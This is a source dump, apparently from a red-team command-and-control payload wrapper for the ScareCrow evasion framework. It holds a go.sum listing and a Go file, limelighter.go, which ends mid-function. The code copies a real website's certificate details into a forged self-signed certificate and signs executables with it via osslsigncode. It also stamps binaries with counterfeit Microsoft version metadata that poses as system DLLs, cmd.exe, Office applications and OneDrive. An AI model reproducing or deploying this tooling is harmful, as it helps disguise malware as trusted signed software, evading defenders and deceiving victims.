github.com/zetamatta/go-outputdebug v0.0.0-20200519164229-222c7991e4ae/go.mod h1:oWzR58pjEbqmQK35Wh+slsMO3H4Chi/24zVIyqJfWNI= 22 | golang.org/x/crypto v0.0.0-20190308221718-c2843e01d9a2/go.mod h1:djNgcEr1/C05ACkg1iLfiJU5Ep61QUkGW8qpdssI0+w= 23 | golang.org/x/crypto v0.0.0-20191011191535-87dc89f01550/go.mod h1:yigFU9vqHzYiE8UmvKecakEJjdnWj3jj499lnFckfCI= 24 | golang.org/x/crypto v0.0.0-20200622213623-75b288015ac9/go.mod h1:LzIPMQfyMNhhGPhUkYOs5KpL4U8rLKemX1yGLhDgUto= 25 | golang.org/x/mod v0.4.1 h1:Kvvh58BN8Y9/lBi7hTekvtMpm07eUZ0ck5pRHpsMWrY= 26 | golang.org/x/mod v0.4.1/go.mod h1:s0Qsj1ACt9ePp/hMypM3fl4fZqREWJwdYDEqhRiZZUA= 27 | golang.org/x/net v0.0.0-20190404232315-eb5bcb51f2a3/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg= 28 | golang.org/x/net v0.0.0-20190620200207-3b0461eec859/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s= 29 | golang.org/x/net v0.0.0-20201021035429-f5854403a974/go.mod h1:sp8m0HH+o8qH0wwXwYZr8TS3Oi6o0r6Gce1SSxlDquU= 30 | golang.org/x/sync v0.0.0-20190423024810-112230192c58/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= 31 | golang.org/x/sync v0.0.0-20201020160332-67f06af15bc9/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= 32 | golang.org/x/sys v0.0.0-20190215142949-d0b11bdaac8a/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= 33 | golang.org/x/sys v0.0.0-20190222072716-a9d3bda3a223/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= 34 | golang.org/x/sys v0.0.0-20190412213103-97732733099d/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= 35 | golang.org/x/sys v0.0.0-20191026070338-33540a1f6037/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= 36 | golang.org/x/sys v0.0.0-20200625212154-ddb9806d33ae h1:Ih9Yo4hSPImZOpfGuA4bR/ORKTAbhZo2AbWNRCnevdo= 37 | golang.org/x/sys v0.0.0-20200625212154-ddb9806d33ae/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= 38 | golang.org/x/sys v0.0.0-20200930185726-fdedc70b468f/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= 39 | golang.org/x/sys 
v0.0.0-20210124154548-22da62e12c0c/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= 40 | golang.org/x/text v0.3.0/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ= 41 | golang.org/x/text v0.3.3/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ= 42 | golang.org/x/tools v0.0.0-20180917221912-90fa682c2a6e/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ= 43 | golang.org/x/tools v0.0.0-20191119224855-298f0cb1881e/go.mod h1:b+2E5dAYhXwXZwtnZ6UAqBI28+e2cm9otk0dWdXHAEo= 44 | golang.org/x/tools v0.1.1-0.20210304221016-50ca8d007de9 h1:lQ9QDTM4SHDP/S/bmj2wjNMQ93AvRYf7kuoqr2MDxmc= 45 | golang.org/x/tools v0.1.1-0.20210304221016-50ca8d007de9/go.mod h1:9bzcO0MWcOuT0tm1iBGzDVPshzfwoVvREIui8C+MHqU= 46 | golang.org/x/xerrors v0.0.0-20190717185122-a985d3407aa7/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= 47 | golang.org/x/xerrors v0.0.0-20191011141410-1b5146add898/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= 48 | golang.org/x/xerrors v0.0.0-20191204190536-9bdfabe68543/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= 49 | golang.org/x/xerrors v0.0.0-20200804184101-5ec99f83aff1 h1:go1bK/D/BFZV2I8cIQd1NKEZ+0owSTG1fDTci4IqFcE= 50 | golang.org/x/xerrors v0.0.0-20200804184101-5ec99f83aff1/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= 51 | gopkg.in/check.v1 v1.0.0-20180628173108-788fd7840127/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0= 52 | gopkg.in/errgo.v2 v2.1.0/go.mod h1:hNsd1EY+bozCKY1Ytp96fpM3vjJbqLJn88ws8XvfDNI= 53 | mvdan.cc/garble v0.2.0 h1:EcSXSbx2ocE42m1tpbSPh0MBu6uYewWj82qyWfXjr7s= 54 | mvdan.cc/garble v0.2.0/go.mod h1:9htOtPZGNFoUyS7Y/R/T7vfnEi386kmsOAhNEoc24ts= 55 | -------------------------------------------------------------------------------- /Payload_Type/scarecrow_wrapper/agent_code/ScareCrow/limelighter/limelighter.go: --------------------------------------------------------------------------------
package limelighter

import (
	"bytes"
	"crypto/rand"
	"crypto/rsa"
	"crypto/tls"
	"crypto/x509"
	"crypto/x509/pkix"
	"encoding/pem"
	"fmt"
	"io"
	"io/ioutil"
	"log"
	crand "math/rand"
	"os"
	"os/exec"
	"strings"
	"time"

	"github.com/josephspurrier/goversioninfo"
)

// letters is the alphabet RandStringBytes draws from.
const letters = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890"

// VarNumberLength returns a random string from letters whose length lies in
// [min, max). It reseeds math/rand from the wall clock on every call, so the
// output is not cryptographically random and must not be used as key
// material. crand.Intn panics when max <= min.
func VarNumberLength(min, max int) string {
	var r string
	crand.Seed(time.Now().UnixNano())
	num := crand.Intn(max-min) + min
	n := num
	r = RandStringBytes(n)
	return r
}

// RandStringBytes returns n characters chosen from letters with math/rand;
// it relies on the caller (VarNumberLength) having seeded the generator.
func RandStringBytes(n int) string {
	b := make([]byte, n)
	for i := range b {
		b[i] = letters[crand.Intn(len(letters))]

	}
	return string(b)
}

// GenerateCert builds a certificate that copies the serial number, subject
// and issuer common names and validity window of the first certificate in
// the chain served by domain on port 443, and signs it with a freshly
// generated 4096-bit RSA key. The key is written to domain+".key" and the
// certificate to domain+".pem".
//
// If the TLS connection fails, the working directory is changed to ".." and
// the directory named by the part of inputFile before its first "." is
// removed before exiting via log.Fatal. The results of pem.Decode and
// x509.ParseCertificate are not checked, so a non-PEM or empty response
// would dereference a nil block or certificate.
func GenerateCert(domain string, inputFile string) {
	var err error
	rootKey, err := rsa.GenerateKey(rand.Reader, 4096)
	if err != nil {
		panic(err)
	}
	certs, err := GetCertificatesPEM(domain + ":443")
	if err != nil {
		os.Chdir("..")
		foldername := strings.Split(inputFile, ".")
		os.RemoveAll(foldername[0])
		log.Fatal("Error: The domain: " + domain + " does not exist or is not accessible from the host you are compiling on")
	}
	// pem.Decode returns only the first block, i.e. the first peer certificate.
	block, _ := pem.Decode([]byte(certs))
	cert, _ := x509.ParseCertificate(block.Bytes)

	keyToFile(domain+".key", rootKey)

	SubjectTemplate := x509.Certificate{
		SerialNumber: cert.SerialNumber,
		Subject: pkix.Name{
			CommonName: cert.Subject.CommonName,
		},
		NotBefore:             cert.NotBefore,
		NotAfter:              cert.NotAfter,
		BasicConstraintsValid: true,
		IsCA:                  true,
		KeyUsage:              x509.KeyUsageDigitalSignature | x509.KeyUsageCertSign,
		ExtKeyUsage:           []x509.ExtKeyUsage{x509.ExtKeyUsageServerAuth, x509.ExtKeyUsageClientAuth},
	}
	// The parent template only supplies the issuer name; the same rootKey
	// signs, so the result is effectively self-signed.
	IssuerTemplate := x509.Certificate{
		SerialNumber: cert.SerialNumber,
		Subject: pkix.Name{
			CommonName: cert.Issuer.CommonName,
		},
		NotBefore: cert.NotBefore,
		NotAfter:  cert.NotAfter,
	}
	derBytes, err := x509.CreateCertificate(rand.Reader, &SubjectTemplate, &IssuerTemplate, &rootKey.PublicKey, rootKey)
	if err != nil {
		panic(err)
	}
	certToFile(domain+".pem", derBytes)

}

// keyToFile writes key to filename as PEM. The bytes are PKCS#8
// (x509.MarshalPKCS8PrivateKey) but the block is labelled "RSA PRIVATE KEY",
// the label conventionally used for PKCS#1; strict readers may reject the
// mismatch. A marshal failure exits with status 2, other failures panic.
func keyToFile(filename string, key *rsa.PrivateKey) {
	file, err := os.Create(filename)
	if err != nil {
		panic(err)
	}
	defer file.Close()
	b, err := x509.MarshalPKCS8PrivateKey(key)
	if err != nil {
		fmt.Fprintf(os.Stderr, "Unable to marshal RSA private key: %v", err)
		os.Exit(2)
	}
	if err := pem.Encode(file, &pem.Block{Type: "RSA PRIVATE KEY", Bytes: b}); err != nil {
		panic(err)
	}
}

// certToFile writes derBytes to filename as a PEM CERTIFICATE block. Every
// failure is fatal; the messages mention cert.pem regardless of filename.
func certToFile(filename string, derBytes []byte) {
	certOut, err := os.Create(filename)
	if err != nil {
		log.Fatalf("[-] Failed to Open cert.pem for Writing: %s", err)
	}
	if err := pem.Encode(certOut, &pem.Block{Type: "CERTIFICATE", Bytes: derBytes}); err != nil {
		log.Fatalf("[-] Failed to Write Data to cert.pem: %s", err)
	}
	if err := certOut.Close(); err != nil {
		log.Fatalf("[-] Error Closing cert.pem: %s", err)
	}
}

// GetCertificatesPEM opens a TLS connection to address (host:port) and
// returns the peer's certificate chain PEM-encoded in the order presented.
// Verification is disabled (InsecureSkipVerify), so any chain is accepted
// and the server is not authenticated. Dial and encode errors are returned.
func GetCertificatesPEM(address string) (string, error) {
	conn, err := tls.Dial("tcp", address, &tls.Config{
		InsecureSkipVerify: true,
	})
	if err != nil {
		return "", err
	}
	defer conn.Close()
	var b bytes.Buffer
	for _, cert := range conn.ConnectionState().PeerCertificates {
		err := pem.Encode(&b, &pem.Block{
			Type:  "CERTIFICATE",
			Bytes: cert.Raw,
		})
		if err != nil {
			return "", err
		}
	}
	return b.String(), nil
}

// GeneratePFK bundles domain.key and domain.pem into domain.pfx by running
// openssl pkcs12 -export; the password is passed on the command line via
// -passin/-passout. The function body continues beyond this listing.
func GeneratePFK(password string, domain string) {
	cmd := exec.Command("openssl", "pkcs12", "-export", "-out", domain+".pfx", "-inkey", domain+".key", "-in", domain+".pem", "-passin", "pass:"+password+"", "-passout", "pass:"+password+"")
err := cmd.Run() 142 | if err != nil { 143 | log.Fatalf("cmd.Run() failed with %s\n", err) 144 | } 145 | } 146 | 147 | func SignExecutable(password string, pfx string, filein string, fileout string) { 148 | cmd := exec.Command("osslsigncode", "sign", "-pkcs12", pfx, "-in", ""+filein+"", "-out", ""+fileout+"", "-pass", ""+password+"") 149 | err := cmd.Run() 150 | if err != nil { 151 | log.Fatalf("cmd.Run() failed with %s\n", err) 152 | } 153 | } 154 | 155 | func FileProperties(name string, configFile string) string { 156 | fmt.Println("[*] Creating an Embedded Resource File") 157 | vi := &goversioninfo.VersionInfo{} 158 | if configFile != "" { 159 | var err error 160 | input := io.ReadCloser(os.Stdin) 161 | if input, err = os.Open("../" + configFile); err != nil { 162 | log.Printf("Cannot open %q: %v", configFile, err) 163 | os.Exit(3) 164 | } 165 | jsonBytes, err := ioutil.ReadAll(input) 166 | input.Close() 167 | if err != nil { 168 | log.Printf("Error reading %q: %v", configFile, err) 169 | os.Exit(3) 170 | } 171 | if err := vi.ParseJSON(jsonBytes); err != nil { 172 | log.Printf("Could not parse the .json file: %v", err) 173 | os.Exit(3) 174 | } 175 | name = vi.StringFileInfo.InternalName 176 | } else if configFile == "" { 177 | if name == "APMon" { 178 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 179 | vi.StringFileInfo.InternalName = "APMon.dll.mui" 180 | vi.StringFileInfo.FileDescription = "Adaptive Port Monitor" 181 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 182 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 
183 | vi.StringFileInfo.OriginalFilename = "C:\\Windows\\System32\\APMon.dll" 184 | vi.FixedFileInfo.ProductVersion.Patch = 18362 185 | vi.FixedFileInfo.ProductVersion.Major = 10 186 | vi.FixedFileInfo.ProductVersion.Minor = 0 187 | vi.StringFileInfo.ProductName = "Microsoft Corporation" 188 | vi.StringFileInfo.ProductVersion = "10.0.18362.1" 189 | vi.FixedFileInfo.FileVersion.Major = 1 190 | vi.FixedFileInfo.FileVersion.Minor = 0 191 | vi.FixedFileInfo.FileVersion.Patch = 18362 192 | vi.FixedFileInfo.FileVersion.Build = 1 193 | vi.StringFileInfo.InternalName = "APMon.dll.mui" 194 | } 195 | if name == "bisr" { 196 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 197 | vi.StringFileInfo.InternalName = "bisrv.dll.mui" 198 | vi.StringFileInfo.FileDescription = "Background Tasks Infrastructure Service" 199 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 200 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 201 | vi.StringFileInfo.OriginalFilename = "C:\\Windows\\System32\bisrv.dll" 202 | vi.FixedFileInfo.ProductVersion.Patch = 18362 203 | vi.FixedFileInfo.ProductVersion.Major = 10 204 | vi.FixedFileInfo.ProductVersion.Minor = 0 205 | vi.StringFileInfo.ProductName = "Microsoft Corporation" 206 | vi.StringFileInfo.ProductVersion = "10.0.18362.1" 207 | vi.FixedFileInfo.FileVersion.Major = 1 208 | vi.FixedFileInfo.FileVersion.Minor = 0 209 | vi.FixedFileInfo.FileVersion.Patch = 18362 210 | vi.FixedFileInfo.FileVersion.Build = 1 211 | vi.StringFileInfo.InternalName = "bisrv.dll.mui" 212 | } 213 | if name == "btpanui" { 214 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 215 | vi.StringFileInfo.InternalName = "btpanui.dll.mui" 216 | vi.StringFileInfo.FileDescription = "Bluetooth PAN User Interface" 217 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 218 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 
219 | vi.StringFileInfo.OriginalFilename = "C:\\Windows\\System32\btpanui.dll" 220 | vi.FixedFileInfo.ProductVersion.Patch = 18362 221 | vi.FixedFileInfo.ProductVersion.Major = 10 222 | vi.FixedFileInfo.ProductVersion.Minor = 0 223 | vi.StringFileInfo.ProductName = "Microsoft Corporation" 224 | vi.StringFileInfo.ProductVersion = "10.0.18362.1" 225 | vi.FixedFileInfo.FileVersion.Major = 1 226 | vi.FixedFileInfo.FileVersion.Minor = 0 227 | vi.FixedFileInfo.FileVersion.Patch = 18362 228 | vi.FixedFileInfo.FileVersion.Build = 1 229 | vi.StringFileInfo.InternalName = "btpanui.dll.mui" 230 | } 231 | if name == "cmdext" { 232 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 233 | vi.StringFileInfo.InternalName = "CmdExt.DLL" 234 | vi.StringFileInfo.FileDescription = "cmd.exe Extension DLL" 235 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 236 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 237 | vi.StringFileInfo.OriginalFilename = "C:\\Windows\\System32\\cmdext.dll" 238 | vi.FixedFileInfo.ProductVersion.Patch = 18362 239 | vi.FixedFileInfo.ProductVersion.Major = 10 240 | vi.FixedFileInfo.ProductVersion.Minor = 0 241 | vi.StringFileInfo.ProductName = "Microsoft Corporation" 242 | vi.StringFileInfo.ProductVersion = "10.0.18362.1" 243 | vi.FixedFileInfo.FileVersion.Major = 1 244 | vi.FixedFileInfo.FileVersion.Minor = 0 245 | vi.FixedFileInfo.FileVersion.Patch = 18362 246 | vi.FixedFileInfo.FileVersion.Build = 1 247 | vi.StringFileInfo.InternalName = "CmdExt.DLL" 248 | } 249 | if name == "httpapi" { 250 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 251 | vi.StringFileInfo.InternalName = "httpapi.dll.mui" 252 | vi.StringFileInfo.FileDescription = "HTTP Protocol Stack API" 253 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 254 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 
255 | vi.StringFileInfo.OriginalFilename = "C:\\Windows\\System32\\httpapi.dll" 256 | vi.FixedFileInfo.ProductVersion.Patch = 18362 257 | vi.FixedFileInfo.ProductVersion.Major = 10 258 | vi.FixedFileInfo.ProductVersion.Minor = 0 259 | vi.StringFileInfo.ProductName = "Microsoft Corporation" 260 | vi.StringFileInfo.ProductVersion = "10.0.18362.1" 261 | vi.FixedFileInfo.FileVersion.Major = 1 262 | vi.FixedFileInfo.FileVersion.Minor = 0 263 | vi.FixedFileInfo.FileVersion.Patch = 18362 264 | vi.FixedFileInfo.FileVersion.Build = 1 265 | vi.StringFileInfo.InternalName = "httpapi.dll.mui" 266 | } 267 | if name == "logoncli" { 268 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 269 | vi.StringFileInfo.InternalName = "LOGONCLI.DLL" 270 | vi.StringFileInfo.FileDescription = "Net Logon Client DLL" 271 | vi.StringFileInfo.FileVersion = "10.0.18362.1237 (WinBuild.160101.0800)" 272 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 273 | vi.StringFileInfo.OriginalFilename = "C:\\Windows\\System32\\logoncli.dll" 274 | vi.FixedFileInfo.ProductVersion.Patch = 18362 275 | vi.FixedFileInfo.ProductVersion.Major = 10 276 | vi.FixedFileInfo.ProductVersion.Minor = 0 277 | vi.StringFileInfo.ProductName = "Microsoft Corporation" 278 | vi.StringFileInfo.ProductVersion = "10.0.18362.1237" 279 | vi.FixedFileInfo.FileVersion.Major = 1 280 | vi.FixedFileInfo.FileVersion.Minor = 0 281 | vi.FixedFileInfo.FileVersion.Patch = 18362 282 | vi.FixedFileInfo.FileVersion.Build = 1237 283 | vi.StringFileInfo.InternalName = "LOGONCLI.DLL" 284 | } 285 | if name == "netlogon" { 286 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 287 | vi.StringFileInfo.InternalName = "NetLogon.DLL.MUI" 288 | vi.StringFileInfo.FileDescription = "Net Logon Services DLL" 289 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 290 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 
291 | vi.StringFileInfo.OriginalFilename = "C:\\Windows\\System32\netlogon.dll" 292 | vi.FixedFileInfo.ProductVersion.Patch = 18362 293 | vi.FixedFileInfo.ProductVersion.Major = 10 294 | vi.FixedFileInfo.ProductVersion.Minor = 0 295 | vi.StringFileInfo.ProductName = "Microsoft Corporation" 296 | vi.StringFileInfo.ProductVersion = "10.0.18362.1" 297 | vi.FixedFileInfo.FileVersion.Major = 1 298 | vi.FixedFileInfo.FileVersion.Minor = 0 299 | vi.FixedFileInfo.FileVersion.Patch = 18362 300 | vi.FixedFileInfo.FileVersion.Build = 1 301 | vi.StringFileInfo.InternalName = "NetLogon.DLL.MUI" 302 | } 303 | if name == "tcpmon" { 304 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 305 | vi.StringFileInfo.InternalName = "tcpmon.dll.mui" 306 | vi.StringFileInfo.FileDescription = "Standard TCP/IP Port Monitor DLL" 307 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 308 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 309 | vi.StringFileInfo.OriginalFilename = "C:\\Windows\\System32\tcpmon.dll" 310 | vi.FixedFileInfo.ProductVersion.Patch = 18362 311 | vi.FixedFileInfo.ProductVersion.Major = 10 312 | vi.FixedFileInfo.ProductVersion.Minor = 0 313 | vi.StringFileInfo.ProductName = "Microsoft Corporation" 314 | vi.StringFileInfo.ProductVersion = "10.0.18362.1" 315 | vi.FixedFileInfo.FileVersion.Major = 1 316 | vi.FixedFileInfo.FileVersion.Minor = 0 317 | vi.FixedFileInfo.FileVersion.Patch = 18362 318 | vi.FixedFileInfo.FileVersion.Build = 1 319 | vi.StringFileInfo.InternalName = "tcpmon.dll.mui" 320 | } 321 | if name == "OneNote" { 322 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 323 | vi.StringFileInfo.InternalName = "OneNote" 324 | vi.StringFileInfo.FileDescription = "Microsoft OneNote" 325 | vi.StringFileInfo.FileVersion = "16.0.13901.20462" 326 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 
327 | vi.StringFileInfo.OriginalFilename = "C:\\Program Files\\Microsoft Office\\root\\Office16\\ONENOTE.EXE" 328 | vi.FixedFileInfo.ProductVersion.Patch = 13901 329 | vi.FixedFileInfo.ProductVersion.Major = 16 330 | vi.FixedFileInfo.ProductVersion.Minor = 0 331 | vi.StringFileInfo.ProductName = "Microsoft Office" 332 | vi.StringFileInfo.ProductVersion = "16.0.13901.20462" 333 | vi.FixedFileInfo.FileVersion.Major = 16 334 | vi.FixedFileInfo.FileVersion.Minor = 0 335 | vi.FixedFileInfo.FileVersion.Patch = 13901 336 | vi.FixedFileInfo.FileVersion.Build = 20462 337 | vi.StringFileInfo.InternalName = "OneNote" 338 | } 339 | 340 | if name == "Excel" { 341 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 342 | vi.StringFileInfo.InternalName = "Excel" 343 | vi.StringFileInfo.FileDescription = "Microsoft Excel" 344 | vi.StringFileInfo.FileVersion = "16.0.11929.20838" 345 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 346 | vi.StringFileInfo.OriginalFilename = "C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE" 347 | vi.FixedFileInfo.ProductVersion.Patch = 11929 348 | vi.FixedFileInfo.ProductVersion.Major = 16 349 | vi.FixedFileInfo.ProductVersion.Minor = 0 350 | vi.StringFileInfo.ProductName = "Microsoft Office" 351 | vi.StringFileInfo.ProductVersion = "16.0.11929.20838" 352 | vi.FixedFileInfo.FileVersion.Major = 16 353 | vi.FixedFileInfo.FileVersion.Minor = 0 354 | vi.FixedFileInfo.FileVersion.Patch = 11929 355 | vi.FixedFileInfo.FileVersion.Build = 20838 356 | vi.StringFileInfo.InternalName = "Excel" 357 | } 358 | if name == "Word" { 359 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 360 | vi.StringFileInfo.InternalName = "Word" 361 | vi.StringFileInfo.FileDescription = "Microsoft Word" 362 | vi.StringFileInfo.FileVersion = "16.0.11929.20838" 363 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 
364 | vi.StringFileInfo.OriginalFilename = "C:\\Program Files\\Microsoft Office\\root\\Office16\\WORD.EXE" 365 | vi.FixedFileInfo.ProductVersion.Patch = 11929 366 | vi.FixedFileInfo.ProductVersion.Major = 16 367 | vi.FixedFileInfo.ProductVersion.Minor = 0 368 | vi.StringFileInfo.ProductName = "Microsoft Office" 369 | vi.StringFileInfo.ProductVersion = "16.0.11929.20838" 370 | vi.FixedFileInfo.FileVersion.Major = 16 371 | vi.FixedFileInfo.FileVersion.Minor = 0 372 | vi.FixedFileInfo.FileVersion.Patch = 11929 373 | vi.FixedFileInfo.FileVersion.Build = 20838 374 | vi.StringFileInfo.InternalName = "Word" 375 | } 376 | if name == "Powerpnt" { 377 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 378 | vi.StringFileInfo.InternalName = "POWERPNT" 379 | vi.StringFileInfo.FileDescription = "Microsoft PowerPoint" 380 | vi.StringFileInfo.FileVersion = "16.0.11929.20838" 381 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 382 | vi.StringFileInfo.OriginalFilename = "C:\\Program Files\\Microsoft Office\\root\\Office16\\POWERPNT.EXE" 383 | vi.FixedFileInfo.ProductVersion.Patch = 11929 384 | vi.FixedFileInfo.ProductVersion.Major = 16 385 | vi.FixedFileInfo.ProductVersion.Minor = 0 386 | vi.StringFileInfo.ProductName = "Microsoft Office" 387 | vi.StringFileInfo.ProductVersion = "16.0.11929.20838" 388 | vi.FixedFileInfo.FileVersion.Major = 16 389 | vi.FixedFileInfo.FileVersion.Minor = 0 390 | vi.FixedFileInfo.FileVersion.Patch = 11929 391 | vi.FixedFileInfo.FileVersion.Build = 20838 392 | vi.StringFileInfo.InternalName = "POWERPNT" 393 | } 394 | if name == "Outlook" { 395 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 396 | vi.StringFileInfo.InternalName = "Outlook.exe" 397 | vi.StringFileInfo.FileDescription = "Microsoft Outlook" 398 | vi.StringFileInfo.FileVersion = "16.0.11929.20838" 399 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 
400 | vi.StringFileInfo.OriginalFilename = "C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE" 401 | vi.FixedFileInfo.ProductVersion.Patch = 11929 402 | vi.FixedFileInfo.ProductVersion.Major = 16 403 | vi.FixedFileInfo.ProductVersion.Minor = 0 404 | vi.StringFileInfo.ProductName = "Microsoft Office" 405 | vi.StringFileInfo.ProductVersion = "16.0.11929.20838" 406 | vi.FixedFileInfo.FileVersion.Major = 16 407 | vi.FixedFileInfo.FileVersion.Minor = 0 408 | vi.FixedFileInfo.FileVersion.Patch = 11929 409 | vi.FixedFileInfo.FileVersion.Build = 20838 410 | vi.StringFileInfo.InternalName = "Outlook" 411 | } 412 | if name == "lync" { 413 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 414 | vi.StringFileInfo.InternalName = "Lync" 415 | vi.StringFileInfo.FileDescription = "Skype for Business" 416 | vi.StringFileInfo.FileVersion = "16.0.11929.20838" 417 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 418 | vi.StringFileInfo.OriginalFilename = "C:\\Program Files\\Microsoft Office\\root\\Office16\\lync.exe" 419 | vi.FixedFileInfo.ProductVersion.Patch = 11929 420 | vi.FixedFileInfo.ProductVersion.Major = 16 421 | vi.FixedFileInfo.ProductVersion.Minor = 0 422 | vi.StringFileInfo.ProductName = "Microsoft Office" 423 | vi.StringFileInfo.ProductVersion = "16.0.11929.20838" 424 | vi.FixedFileInfo.FileVersion.Major = 16 425 | vi.FixedFileInfo.FileVersion.Minor = 0 426 | vi.FixedFileInfo.FileVersion.Patch = 11929 427 | vi.FixedFileInfo.FileVersion.Build = 20838 428 | vi.StringFileInfo.InternalName = "Lync" 429 | } 430 | if name == "cmd" { 431 | vi.StringFileInfo.InternalName = "cmd" 432 | vi.StringFileInfo.FileDescription = "Windows Command Processor" 433 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 434 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 
435 | vi.StringFileInfo.OriginalFilename = "C:\\Windows\\System32\\cmd.exe" 436 | vi.FixedFileInfo.ProductVersion.Patch = 1 437 | vi.FixedFileInfo.ProductVersion.Major = 10 438 | vi.FixedFileInfo.ProductVersion.Minor = 0 439 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 440 | vi.StringFileInfo.ProductVersion = "10.0.18362.1" 441 | vi.FixedFileInfo.FileVersion.Major = 10 442 | vi.FixedFileInfo.FileVersion.Minor = 0 443 | vi.FixedFileInfo.FileVersion.Patch = 1 444 | vi.FixedFileInfo.FileVersion.Build = 18362 445 | vi.StringFileInfo.InternalName = "cmd.exe" 446 | } 447 | if name == "OneDrive" { 448 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 449 | vi.StringFileInfo.InternalName = "OneDrive.exe" 450 | vi.StringFileInfo.FileDescription = "Microsoft OneDrive" 451 | vi.StringFileInfo.FileVersion = "20.114.0607.0002" 452 | vi.StringFileInfo.LegalCopyright = "©¿½ Microsoft Corporation. All rights reserved." 453 | vi.StringFileInfo.OriginalFilename = "OneDrive.exe" 454 | vi.FixedFileInfo.ProductVersion.Patch = 2 455 | vi.FixedFileInfo.ProductVersion.Major = 20 456 | vi.FixedFileInfo.ProductVersion.Minor = 114 457 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 458 | vi.StringFileInfo.ProductVersion = "20.114.0607.0002" 459 | vi.FixedFileInfo.FileVersion.Major = 20 460 | vi.FixedFileInfo.FileVersion.Minor = 114 461 | vi.FixedFileInfo.FileVersion.Patch = 2 462 | vi.FixedFileInfo.FileVersion.Build = 607 463 | vi.StringFileInfo.InternalName = "OneDrive.exe" 464 | } 465 | if name == "apphelp" { 466 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 467 | vi.StringFileInfo.InternalName = "Apphelp" 468 | vi.StringFileInfo.FileDescription = "Application Compatibility Client Library" 469 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 470 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 
